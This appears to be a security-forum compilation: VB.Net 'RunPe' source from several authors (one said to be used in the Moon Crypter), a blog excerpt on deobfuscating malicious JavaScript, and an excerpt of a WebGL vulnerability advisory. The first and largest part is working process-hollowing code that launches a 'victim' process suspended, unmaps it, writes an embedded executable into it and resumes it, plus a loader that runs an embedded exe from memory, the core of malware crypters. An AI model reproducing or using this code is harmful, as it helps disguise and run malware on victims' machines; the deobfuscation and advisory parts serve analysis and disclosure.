Nytro

[VB.Net] RunPe's Reflection RunPe Credits: Deathader Imports System Imports System.Windows.Forms Imports System.Reflection Imports System.IO Imports System.Runtime.CompilerServices Private Function ReadExeFromFile(ByVal filename As String) As Byte() Dim fs As New FileStream(filename, FileMode.Open, FileAccess.Read) Dim exeData As Byte() = New Byte(fs.Length - 1) {} fs.Read(exeData, 0, System.Convert.ToInt32(fs.Length)) fs.Close() Return exeData End Function Private Function ReadExeFromResources(ByVal filename As String) As Byte() Dim CurrentAssembly As Reflection.Assembly = Reflection.Assembly.GetExecutingAssembly() Dim Resource As String = String.Empty Dim ArrResources As String() = CurrentAssembly.GetManifestResourceNames() For Each Resource In ArrResources If Resource.IndexOf(filename) > -1 Then _ Exit For Next Dim ResourceStream As IO.Stream = CurrentAssembly.GetManifestResourceStream(Resource) If ResourceStream Is Nothing Then Return Nothing End If Dim ResourcesBuffer(CInt(ResourceStream.Length) - 1) As Byte ResourceStream.Read(ResourcesBuffer, 0, ResourcesBuffer.Length) ResourceStream.Close() Return ResourcesBuffer End Function Private Function StringToByteArray(ByVal str As String) As Byte() Dim encoding As New System.Text.ASCIIEncoding() Return encoding.GetBytes(str) End Function Private Sub RunFromMemory(ByVal bytes As Byte()) Dim assembly As Assembly = assembly.Load(bytes) Dim entryPoint As MethodInfo = [assembly].EntryPoint Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name)) entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}}) End Sub USAGE: Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click Dim x As New Threading.Thread(AddressOf RunFromMemory) x.Start(ReadExeFromResources("EmbeddedExe.exe")) End Sub T0fx Pe & JapaBrz PE t0fx RunPe[used in Moon Crypter] [CODE]Class RunPE Public Const PAGE_NOCACHE As Long = &H200 Public Const PAGE_EXECUTE_READWRITE As Long = &H40 Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80 Public Const PAGE_EXECUTE_READ As Long = &H20 Public Const PAGE_EXECUTE As Long = &H10 Public Const PAGE_WRITECOPY As Long = &H8 Public Const PAGE_NOACCESS As Long = &H1 Public Const PAGE_READWRITE As Long = &H4 Public Const PAGE_READONLY As System.UInt32 = &H2 Shared Sub Execute(ByVal data() As Byte, ByVal target As String) Dim C = New H.Context, SH As H.Section_Header, PI = New H.Process_Information, SI = New H.Startup_Information, PS = New H.Security_Flags, TS = New H.Security_Flags Dim GC = System.Runtime.InteropServices.GCHandle.Alloc(data, System.Runtime.InteropServices.GCHandleType.Pinned) Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32 Dim DH As New H.DOS_Header DH = System.Runtime.InteropServices.Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType) GC.Free() If H.CreateProcess(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return Dim NH As New H.NT_Headers NH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + DH.Address), NH.GetType) Dim Address, Offset As Long, ret As UInteger SI.CB = Len(SI) C.Flags = 65538 If NH.Signature <> 17744 Or DH.Magic <> 23117 Then Return If H.GetThreadContext(PI.Thread, C) And H.ReadProcessMemory(PI.Process, C.Ebx + 8, Address, 4, 0) >= 0 And H.ZwUnmapViewOfSection(PI.Process, Address) >= 0 Then Dim ImageBase As System.UInt32 = H.VirtualAllocEx(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4) If ImageBase <> 0 Then H.WriteProcessMemory(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret) Offset = DH.Address + 248 For I As Integer = 0 To NH.File.Sections - 1 SH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + Offset + I * 40), SH.GetType) Dim Raw(SH.Size) As Byte For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next H.WriteProcessMemory(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret) H.VirtualProtectEx(PI.Process, ImageBase + SH.Address, SH.Misc.Size, Protect(SH.Flags), Address) Next I Dim T = BitConverter.GetBytes(ImageBase) H.WriteProcessMemory(PI.Process, C.Ebx + 8, T, 4, ret) C.Eax = ImageBase + NH.Optional.Address H.SetThreadContext(PI.Thread, C) H.ResumeThread(PI.Thread) End If End If End Sub Public Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift) End Function Public Shared Function vbLongToULong(ByVal Value As Long) As Double Const OFFSET_4 = 4294967296.0# If Value < 0 Then vbLongToULong = Value + OFFSET_4 Else vbLongToULong = Value End If End Function Public Shared Function Protect(ByVal characteristics As Long) As Long Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _ PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _ PAGE_READWRITE, PAGE_EXECUTE_READWRITE} Protect = mapping(RShift(characteristics, 29)) End Function <System.ComponentModel.EditorBrowsable(1)> Friend Class H <System.Runtime.InteropServices.StructLayout(0)> Structure Context Dim Flags, D0, D1, D2, D3, D6, D7 As System.UInt32, Save As Save Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As System.UInt32 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte() End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Save Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte() Dim State As System.UInt32 End Structure Structure Misc Dim Address, Size As System.UInt32 End Structure Structure Section_Header Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As System.UInt32 End Structure Structure Process_Information Dim Process, Thread As System.IntPtr, ProcessId, ThreadId As Integer End Structure <System.Runtime.InteropServices.StructLayout(0, CharSet:=3)> Structure Startup_Information Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Security_Flags Dim Length As Integer, Descriptor As System.IntPtr, Inherit As Integer End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure DOS_Header Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As System.UInt16 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As System.UInt16() Dim ID, Info As System.UInt16 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As System.UInt16() Dim Address As System.Int32 End Structure Structure NT_Headers Dim Signature As System.UInt32, File As File_Header, [Optional] As Optional_Headers End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure File_Header Dim Machine, Sections As System.UInt16, Stamp, Table, Symbols As System.UInt32, Size, Flags As System.UInt16 End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Optional_Headers Public Magic As System.UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As System.UInt32, SectionA, FileA As System.UInt32 Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As System.UInt16, Version, SImage, SHeaders, Checksum As System.UInt32, Subsystem, Flags As System.UInt16 Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As System.UInt32 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As Data_Directory() End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Data_Directory Dim Address, Size As System.UInt32 End Structure Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As System.UInt32, ByVal system As System.IntPtr, ByVal current As String, <System.Runtime.InteropServices.In()> ByRef startup As Startup_Information, <System.Runtime.InteropServices.Out()> ByRef info As Process_Information) As Boolean Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal buffer As Byte(), ByVal size As System.IntPtr, <System.Runtime.InteropServices.Out()> ByRef written As Integer) As Boolean Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByRef buffer As System.IntPtr, ByVal size As System.IntPtr, ByRef read As Integer) As Integer Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UIntPtr, ByVal [new] As System.UIntPtr, <System.Runtime.InteropServices.Out()> ByVal old As System.UInt32) As Integer Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UInt32, ByVal type As System.UInt32, ByVal protect As System.UInt32) As System.IntPtr Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As System.IntPtr, ByVal address As System.IntPtr) As Long Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As System.IntPtr) As System.UInt32 Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As System.IntPtr, ByRef context As Context) As Boolean Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As System.IntPtr, ByRef context As Context) As Boolean End Class End Class JapaBrz RunPe 'Made by JapaBrz Imports System.Runtime.InteropServices Imports System.Text Class DD <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _ Structure STARTUPINFO Public cb As Integer Public lpReserved As String Public lpDesktop As String Public lpTitle As String Public dwX As Integer Public dwY As Integer Public dwXSize As Integer Public dwYSize As Integer Public dwXCountChars As Integer Public dwYCountChars As Integer Public dwFillAttribute As Integer Public dwFlags As Integer Public wShowWindow As Short Public cbReserved2 As Short Public lpReserved2 As Integer Public hStdInput As Integer Public hStdOutput As Integer Public hStdError As Integer End Structure Private Structure PROCESS_INFORMATION Public hProcess As IntPtr Public hThread As IntPtr Public dwProcessId As Integer Public dwThreadId As Integer End Structure <StructLayout(LayoutKind.Sequential)> _ Private Structure IMAGE_DOS_HEADER Public e_magic As UInt16 ' Magic number Public e_cblp As UInt16 ' Bytes on last page of file Public e_cp As UInt16 ' Pages in file Public e_crlc As UInt16 ' Relocations Public e_cparhdr As UInt16 ' Size of header in paragraphs Public e_minalloc As UInt16 ' Minimum extra paragraphs needed Public e_maxalloc As UInt16 ' Maximum extra paragraphs needed Public e_ss As UInt16 ' Initial (relative) SS value Public e_sp As UInt16 ' Initial SP value Public e_csum As UInt16 ' Checksum Public e_ip As UInt16 ' Initial IP value Public e_cs As UInt16 ' Initial (relative) CS value Public e_lfarlc As UInt16 ' File address of relocation table Public e_ovno As UInt16 ' Overlay number <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> _ Public e_res1 As UInt16() ' Reserved words Public e_oemid As UInt16 ' OEM identifier (for e_oeminfo) Public e_oeminfo As UInt16 ' OEM information; e_oemid specific <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> _ Public e_res2 As UInt16() ' Reserved words Public e_lfanew As Int32 ' File address of new EXE header End Structure <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _ Private Structure VS_VERSIONINFO Public wLength As UInt16 Public wValueLength As UInt16 Public wType As UInt16 <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=15)> _ Public szKey As String Public Padding1 As UInt16 End Structure <StructLayout(LayoutKind.Sequential)> _ Structure SECURITY_ATTRIBUTES Public nLength As Integer Public lpSecurityDescriptor As IntPtr Public bInheritHandle As Integer End Structure <StructLayout(LayoutKind.Sequential)> _ Private Structure VS_FIXEDFILEINFO Public dwSignature As UInt32 Public dwStrucVersion As UInt32 Public dwFileVersionMS As UInt32 Public dwFileVersionLS As UInt32 Public dwProductVersionMS As UInt32 Public dwProductVersionLS As UInt32 Public dwFileFlagsMask As UInt32 Public dwFileFlags As UInt32 Public dwFileOS As UInt32 Public dwFileType As UInt32 Public dwFileSubtype As UInt32 Public dwFileDateMS As UInt32 Public dwFileDateLS As UInt32 End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure FLOATING_SAVE_AREA Public ControlWord As UInteger Public StatusWord As UInteger Public TagWord As UInteger Public ErrorOffset As UInteger Public ErrorSelector As UInteger Public DataOffset As UInteger Public DataSelector As UInteger <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> _ Public RegisterArea As Byte() Public Cr0NpxState As UInteger End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure CONTEXT Public ContextFlags As UInteger 'set this to an appropriate value ' Retrieved by CONTEXT_DEBUG_REGISTERS Public Dr0 As UInteger Public Dr1 As UInteger Public Dr2 As UInteger Public Dr3 As UInteger Public Dr6 As UInteger Public Dr7 As UInteger ' Retrieved by CONTEXT_FLOATING_POINT Public FloatSave As FLOATING_SAVE_AREA ' Retrieved by CONTEXT_SEGMENTS Public SegGs As UInteger Public SegFs As UInteger Public SegEs As UInteger Public SegDs As UInteger ' Retrieved by CONTEXT_INTEGER Public Edi As UInteger Public Esi As UInteger Public Ebx As UInteger Public Edx As UInteger Public Ecx As UInteger Public Eax As UInteger ' Retrieved by CONTEXT_CONTROL Public Ebp As UInteger Public Eip As UInteger Public SegCs As UInteger Public EFlags As UInteger Public Esp As UInteger Public SegSs As UInteger ' Retrieved by CONTEXT_EXTENDED_REGISTERS <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> _ Public ExtendedRegisters As Byte() End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure IMAGE_OPTIONAL_HEADER32 ' ' Standard fields. ' Public Magic As UInt16 Public MajorLinkerVersion As [Byte] Public MinorLinkerVersion As [Byte] Public SizeOfCode As UInt32 Public SizeOfInitializedData As UInt32 Public SizeOfUninitializedData As UInt32 Public AddressOfEntryPoint As UInt32 Public BaseOfCode As UInt32 Public BaseOfData As UInt32 ' ' NT additional fields. ' Public ImageBase As UInt32 Public SectionAlignment As UInt32 Public FileAlignment As UInt32 Public MajorOperatingSystemVersion As UInt16 Public MinorOperatingSystemVersion As UInt16 Public MajorImageVersion As UInt16 Public MinorImageVersion As UInt16 Public MajorSubsystemVersion As UInt16 Public MinorSubsystemVersion As UInt16 Public Win32VersionValue As UInt32 Public SizeOfImage As UInt32 Public SizeOfHeaders As UInt32 Public CheckSum As UInt32 Public Subsystem As UInt16 Public DllCharacteristics As UInt16 Public SizeOfStackReserve As UInt32 Public SizeOfStackCommit As UInt32 Public SizeOfHeapReserve As UInt32 Public SizeOfHeapCommit As UInt32 Public LoaderFlags As UInt32 Public NumberOfRvaAndSizes As UInt32 <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> _ Public DataDirectory As IMAGE_DATA_DIRECTORY() End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure IMAGE_FILE_HEADER Public Machine As UInt16 Public NumberOfSections As UInt16 Public TimeDateStamp As UInt32 Public PointerToSymbolTable As UInt32 Public NumberOfSymbols As UInt32 Public SizeOfOptionalHeader As UInt16 Public Characteristics As UInt16 End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure IMAGE_DATA_DIRECTORY Public VirtualAddress As UInt32 Public Size As UInt32 End Structure Public Structure IMAGE_NT_HEADERS Public Signature As UInt32 Public FileHeader As IMAGE_FILE_HEADER Public OptionalHeader As IMAGE_OPTIONAL_HEADER32 End Structure Public Enum IMAGE_SIZEOF_SHORT_NAME IMAGE_SIZEOF_SHORT_NAME = 8 End Enum Public Structure Misc Public PhysicalAddress As System.UInt32 Public VirtualSize As System.UInt32 End Structure Public Structure IMAGE_SECTION_HEADER Public Name As System.Byte Public Misc As Misc Public VirtualAddress As System.UInt32 Public SizeOfRawData As System.UInt32 Public PointerToRawData As System.UInt32 Public PointerToRelocations As System.UInt32 Public PointerToLinenumbers As System.UInt32 Public NumberOfRelocations As System.UInt16 Public NumberOfLinenumbers As System.UInt16 Public Characteristics As System.UInt32 End Structure Public Const CONTEXT_X86 = &H10000 Public Const CONTEXT86_CONTROL = (CONTEXT_X86 Or &H1) 'SS:SP, CS:IP, FLAGS, BP Public Const CONTEXT86_INTEGER = (CONTEXT_X86 Or &H2) 'AX, BX, CX, DX, SI, DI Public Const CONTEXT86_SEGMENTS = (CONTEXT_X86 Or &H4) 'DS, ES, FS, GS Public Const CONTEXT86_FLOATING_POINT = (CONTEXT_X86 Or &H8) '387 state Public Const CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 Or &H10) 'DB 0-3,6,7 Public Const CONTEXT86_FULL = (CONTEXT86_CONTROL Or CONTEXT86_INTEGER Or CONTEXT86_SEGMENTS) Public Const CREATE_SUSPENDED = &H4 Public Const MEM_COMMIT As Long = &H1000& Public Const MEM_RESERVE As Long = &H2000& Public Const PAGE_NOCACHE As Long = &H200 Public Const PAGE_EXECUTE_READWRITE As Long = &H40 Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80 Public Const PAGE_EXECUTE_READ As Long = &H20 Public Const PAGE_EXECUTE As Long = &H10 Public Const PAGE_WRITECOPY As Long = &H8 Public Const PAGE_NOACCESS As Long = &H1 Public Const PAGE_READWRITE As Long = &H4 <DllImport("kernel32.dll")> _ Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInt32 End Function <DllImport("kernel32.dll")> _ Private Shared Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean End Function <DllImport("kernel32.dll")> _ Private Shared Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean End Function <DllImport("kernel32.dll")> _ Private Shared Function LoadLibraryA(ByVal lpLibFileName As String) As Integer End Function <DllImport("kernel32.dll")> _ Private Shared Function CreateProcess(ByVal lpApplicationName As String, _ ByVal lpCommandLine As String, ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _ ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Boolean, _ ByVal dwCreationFlags As UInt32, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, _ <[In]()> ByRef lpStartupInfo As STARTUPINFO, _ <[Out]()> ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean End Function <DllImport("kernel32.dll", _ SetLastError:=True, _ CharSet:=CharSet.Auto, _ EntryPoint:="WriteProcessMemory", _ CallingConvention:=CallingConvention.StdCall)> _ Shared Function WriteProcessMemory( _ ByVal hProcess As IntPtr, _ ByVal lpBaseAddress As IntPtr, _ ByVal lpBuffer As Byte(), _ ByVal iSize As Int32, _ <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean End Function <DllImport("kernel32.dll", _ SetLastError:=True, _ CharSet:=CharSet.Auto, _ EntryPoint:="WriteProcessMemory", _ CallingConvention:=CallingConvention.StdCall)> _ Shared Function WriteProcessMemoryI( _ ByVal hProcess As IntPtr, _ ByVal lpBaseAddress As IntPtr, _ ByVal lpBuffer As IntPtr, _ ByVal iSize As Int32, _ <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean End Function <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory")> _ Public Shared Function ReadProcessMemory(ByVal hProcess As IntPtr, _ ByVal lpBaseAddress As Integer, _ ByRef lpbuffer As IntPtr, _ ByVal size As Integer, _ ByRef lpNumberOfBytesRead As Integer) As Int32 End Function <DllImport("ntdll.dll")> _ Public Shared Function ZwUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal BaseAddress As IntPtr) As Long End Function <DllImport("kernel32.dll", SetLastError:=True, ExactSpelling:=True)> _ Public Shared Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, _ ByVal dwSize As UInteger, ByVal flAllocationType As UInteger, _ ByVal flProtect As UInteger) As IntPtr End Function <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _ Public Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UIntPtr, ByVal flNewProtect As UIntPtr, <Out()> ByVal lpflOldProtect As UInteger) As Integer End Function Const GENERIC_READ As Int32 = &H80000000 Const FILE_SHARE_READ As UInt32 = &H1 Const OPEN_EXISTING As UInt32 = 3 Const FILE_ATTRIBUTE_NORMAL As UInt32 = &H80 Const INVALID_HANDLE_VALUE As Int32 = -1 Const PAGE_READONLY As UInt32 = &H2 Const FILE_MAP_READ As UInt32 = &H4 Const IMAGE_DOS_SIGNATURE As UInt16 = &H5A4D Const RT_VERSION As Int32 = 16 Private Enum ImageSignatureTypes IMAGE_DOS_SIGNATURE = &H5A4D ''\\ MZ IMAGE_OS2_SIGNATURE = &H454E ''\\ NE IMAGE_OS2_SIGNATURE_LE = &H454C ''\\ LE IMAGE_VXD_SIGNATURE = &H454C ''\\ LE IMAGE_NT_SIGNATURE = &H4550 ''\\ PE00 End Enum Public Shared Sub SRexec(ByVal b() As Byte, ByVal sVictim As String) Dim sVersion As [String] = Nothing Dim pidh As IMAGE_DOS_HEADER Dim context As CONTEXT = New CONTEXT() Dim Pinh As IMAGE_NT_HEADERS Dim Pish As IMAGE_SECTION_HEADER Dim pi As PROCESS_INFORMATION = New PROCESS_INFORMATION() Dim si As STARTUPINFO = New STARTUPINFO() Dim pSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES() Dim tSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES() 'converts a data type in another type. 'since .net types are different from types handle by winAPI, DirectCall a API will cause a type mismatch, since .net types ' structure is completely different, using different resources. Dim MyGC As GCHandle = GCHandle.Alloc(b, GCHandleType.Pinned) Dim ptbuffer As Integer = MyGC.AddrOfPinnedObject.ToInt32 pidh = Marshal.PtrToStructure(MyGC.AddrOfPinnedObject, pidh.GetType) MyGC.Free() If CreateProcess(Nothing, sVictim, pSec, tSec, False, &H4, Nothing, Nothing, si, pi) = 0 Then Exit Sub End If Dim vt As Integer = ptbuffer + pidh.e_lfanew Pinh = Marshal.PtrToStructure(New IntPtr(vt), Pinh.GetType) Dim addr As Long, lOffset As Long, ret As UInteger si.cb = Len(si) context.ContextFlags = CONTEXT86_INTEGER 'all "IF" are only for better understanding, you could do all verification on the builder and then the rest on the stub If Pinh.Signature <> ImageSignatureTypes.IMAGE_NT_SIGNATURE Or pidh.e_magic <> ImageSignatureTypes.IMAGE_DOS_SIGNATURE Then Exit Sub If GetThreadContext(pi.hThread, context) And _ ReadProcessMemory(pi.hProcess, context.Ebx + 8, addr, 4, 0) >= 0 And _ ZwUnmapViewOfSection(pi.hProcess, addr) >= 0 Then Dim ImageBase As UInt32 = VirtualAllocEx(pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE) If ImageBase <> 0 Then WriteProcessMemory(pi.hProcess, ImageBase, b, Pinh.OptionalHeader.SizeOfHeaders, ret) lOffset = pidh.e_lfanew + 248 For i As Integer = 0 To Pinh.FileHeader.NumberOfSections - 1 'math changes, anyone with pe understanding know Pish = Marshal.PtrToStructure(New IntPtr(ptbuffer + lOffset + i * 40), Pish.GetType) Dim braw(Pish.SizeOfRawData) As Byte 'more math for reading only the section. mm API has a "shortcut" when you pass a specified startpoint. '.net can't use so you have to make a new array For j As Integer = 0 To Pish.SizeOfRawData - 1 braw(j) = b(Pish.PointerToRawData + j) Next WriteProcessMemory(pi.hProcess, ImageBase + Pish.VirtualAddress, braw, Pish.SizeOfRawData, ret) VirtualProtectEx(pi.hProcess, ImageBase + Pish.VirtualAddress, Pish.Misc.VirtualSize, Protect(Pish.Characteristics), addr) Next i Dim bb As Byte() = BitConverter.GetBytes(ImageBase) WriteProcessMemory(pi.hProcess, context.Ebx + 8, bb, 4, ret) context.Eax = ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint Call SetThreadContext(pi.hThread, context) Call ResumeThread(pi.hThread) End If End If End Sub Private Shared Function Protect(ByVal characteristics As Long) As Long Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _ PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _ PAGE_READWRITE, PAGE_EXECUTE_READWRITE} Protect = mapping(RShift(characteristics, 29)) End Function Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift) End Function Private Shared Function vbLongToULong(ByVal Value As Long) As Double Const OFFSET_4 = 4294967296.0# If Value < 0 Then vbLongToULong = Value + OFFSET_4 Else vbLongToULong = Value End If End Function End Class Usage: SRexec(something, Application.ExecutablePath) Sursa: [VB.Net] RunPe's Thread - r00tsecurity

Javascript Deobfuscation Tools (Part 1) Posted on June 17, 2011 by darryl Deobfuscating Javascript can be tricky so why not make the job easier by using a tool? There’s several tools that can help you deobfuscate Javascript. Before I get to those tools, I wanted to show you how to deobfuscate them manually. I’ve been getting a lot of requests from folks who want to learn how to deobfuscate malscripts so this article is for you. Let’s have a look at the malicious scripts. These scripts were found in the wild and randomly selected based on its difficulty. I’ve uploaded these scripts to Pastebin.com so you can play along (warning, these are real malicious scripts so take the necessary precautions!). Sample 1 This script is simple and should be easy for the tools to handle. There are interweaving comments that do nothing but throw you off visually. The script concatenates a long string of hex characters which are converted to text and reversed. Each text character is then searched for in a string and a corresponding new character is referenced. Here’s the string that the characters are searched for and the second line is the converted value: SP%cpH2W5C83fEX:1rjF9AQdMlKi/sk4GuvtxJOBm_U.NqzY7aw&nhgZoVT=0IbRDye?6-L 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=% For example, if the first value is “L”, it will be converted to “%”. These new characters are joined together to form another string of hex characters which are finally unescaped to form the final script. Here’s what you can do to see the final script: And this is what you get: ince this article is about tools, here’s a program that I wrote. It’s called Revelo (which is Latin for “reveal”) but it’s not quite ready for public release. This tool automates some of the manual changes I make to the scripts to deobfuscate the code. It’s not a debugger and more like a set of tools. Revelo has a built-in packet sniffer and proxy so I can capture the resulting HTTP request and see the URLs without actually visiting the site. It also has a built-in firewall to protect my PC from accidental redirects. Besides that, it can also reveal the actual deobfuscated code. I select the “Enclose Javascript in TextArea” option and get the resulting code: Mai sunt inca 2 exemple. Articol complet: http://www.kahusecurity.com/2011/javascript-deobfuscation-tools-part-1/

WebGL – More WebGL Security Flaws James Forshaw, Paul Stone, Michael Jordon 16th June 2011 Summary In this blog post Context demonstrates how to steal user data through web browsers using a vulnerability in Firefox’s implementation of WebGL. This is a continuation of our research into serious design flaws that could affect any browser which implements WebGL, currently Chrome and Firefox. Context has been researching the new 3D graphics technology, WebGL, which allows web pages to draw fast 3D graphics in a similar manner to computer games. This exciting technology has the capability to deliver a much richer experience to web users. However, to enable this impressive breakthrough in online technology, web browsers (currently Chrome and Firefox) have had to expose low level parts of their operating systems which previously could not be directly accessed by potentially malicious web pages, thus creating a number of potential security vulnerabilities. Context identified this (and other) issues with WebGL by evaluating Chrome and Firefox WebGL implementations against the conformance test suite devised by Khronos, the consortium which draws up the WebGL specification. We have established that none of the current implementations comply with this standard. Furthermore, Context’s research found that Khronos’ recommended defence against the DoS issue (WebGL_ARB_robustness) is not fit for purpose. First, only certain chipsets and operating systems (NVidia on Windows and Linux) support this feature. Moreover, this extension only offers mitigation, not a comprehensive solution to WebGL DoS issues. In the video below, we show how anyone running Firefox 4 with WebGL support is vulnerable to having malicious web pages capture screenshots of any window on their system. These screenshots could be of other web pages, the user’s desktop and other applications that run on their system. Background In our first blog Context outlines serious security concerns related to the use of WebGL. We were able to steal images from other web pages and crash people’s machines (Denial of Service, or DoS) from a malicious website. These examples showed the danger of allowing malicious code to run on graphics cards which were never designed to defend against this threat. After reviewing our previous work Firefox has now removed support for cross-domain images (https://hacks.mozilla.org/2011/06/cross-domain-webgl-textures-disabled-in-firefox-5); while Khronos is updating the WebGL specification to include protection from DoS (using a new OpenGL extension GL_ARB_robustness) and Cross-Origin Resource Shading (CORS) attacks (WebGL Security - khronos.org news). The fact that it is doing so begs the question as to whether this technology was specified, designed and implemented with security in mind. The problems we identified in our first blog were examples of the types of issues that can be created as a result of WebGL use. It is not totally unexpected or unusual for there to be security issues associated with a new technology, but it is crucial that the standard and the correct mitigation processes are quickly adjusted once such problems are identified to ensure that end user security is not compromised. To this end Context reviewed the conformance tests that Khronos has provided for WebGL vendors to use in assessing compliance to the standard. Through this work Context has discovered that neither Chrome nor Firefox passed the Khronos tests, including a number that are directly related to security. Context then explored the consequences of one of the failed conformance tests: the issue it identified allowed us to extract images containing data from the user’s desktop and from other web browser sessions such as authenticated pages. This issue was specific to Firefox and will be fixed in the next version of the browser. If you are concerned by WebGL based attacks see our FAQ for details on whether you are vulnerable and if so how to protect yourself. Articol complet: http://www.contextis.com/resources/blog/webgl2/

